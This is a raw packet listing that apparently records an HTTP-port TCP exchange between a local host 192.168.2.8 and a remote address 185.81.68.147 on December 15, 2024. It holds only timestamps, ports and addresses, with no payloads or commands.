                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.689579964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.689634085 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.689641953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.690431118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.690484047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.690538883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.691345930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.691414118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.691457987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.692325115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.692375898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.692413092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.693181992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.693236113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.693319082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.694120884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.694176912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.694190979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.743278980 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.830154896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.830240011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.830322981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.830334902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.830418110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.830461979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.831140995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.831193924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.831286907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.831944942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.832046986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.832135916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.832758904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.832931995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.833019972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.833686113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.833946943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.834034920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.834666967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.834762096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.834846973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.835581064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.835684061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.835779905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.836466074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.836592913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.836683989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.837529898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.837687969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.837780952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.839440107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.839479923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.839519024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.839569092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.839613914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.839662075 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.840692997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.840713024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.840810061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.841101885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.841181993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.841259003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.841968060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.842088938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.842175007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.843045950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.843060970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.843163013 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.843796968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.843895912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.843978882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.845000982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.845067024 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.845149994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.845812082 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.845827103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.845927954 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.846559048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.846646070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.846730947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.847487926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.847592115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.847682953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.848352909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.848478079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.848563910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.849298954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.849400997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.849477053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.850538969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.850620985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.850699902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.851207972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.851259947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.851349115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.852096081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.852174997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.852262020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.853079081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.853162050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.853249073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.853910923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.854010105 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.854089022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.854873896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.855031967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.855118036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.855818033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.855879068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.855961084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.856648922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.856745958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.856834888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.857567072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.857662916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.857754946 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.858499050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.858577967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.858654022 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.859421968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.859532118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.859612942 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.860348940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.860418081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.860496998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.861243010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.861341953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.861422062 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.862176895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.862272978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.862354994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.863074064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.863204956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.863289118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.863993883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.864181042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.864259005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.864900112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.865006924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.865087032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.865866899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.865933895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.866012096 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.866755009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.866868019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.866946936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.867685080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.867851019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.867923021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.868542910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.878559113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.878576040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.878612041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.878815889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.878856897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.878899097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.879668951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.879734039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.879775047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.880650043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.880707979 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.880738974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.881510019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.881571054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.881627083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.882441998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.882492065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.882520914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.883363962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.883416891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.883480072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.884269953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.884324074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.884367943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.885587931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.885637999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.885665894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.886146069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.886189938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.886224985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.887219906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:41.887320995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.021965027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.021994114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.022104025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.022344112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.022445917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.022525072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.023010969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.023025036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.023122072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.023993015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.024066925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.024149895 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.024801016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.024868011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.024947882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.025979042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.025993109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.026087046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.026648045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.026757002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.026803970 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.027558088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.027972937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.028059006 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.028558016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.028686047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.028785944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.029500961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.029622078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.029700041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.030745029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.030776978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.030858040 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.031575918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.031660080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.031754017 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.032392025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.032542944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.032618999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.033627987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.033644915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.033737898 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.034303904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.034380913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.034457922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.035160065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.035250902 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.035342932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.035912037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.036056042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.036154985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.036745071 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.036854982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.036933899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.037667036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.037779093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.037859917 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.038558960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.038692951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.038793087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.039639950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.039681911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.039762974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.040426016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.040538073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.040621042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.041352987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.041436911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.041515112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.042243004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.042361975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.042443991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.043199062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.043304920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.043382883 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.044153929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.044271946 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.044353962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.045007944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.045078993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.045159101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.045974016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.046081066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.046165943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.046852112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.046984911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.047068119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.047776937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.047885895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.047970057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.048892021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.049067020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.049149036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.049766064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.049833059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:42.049913883 CET4970980192.168.2.8185.81.68.147
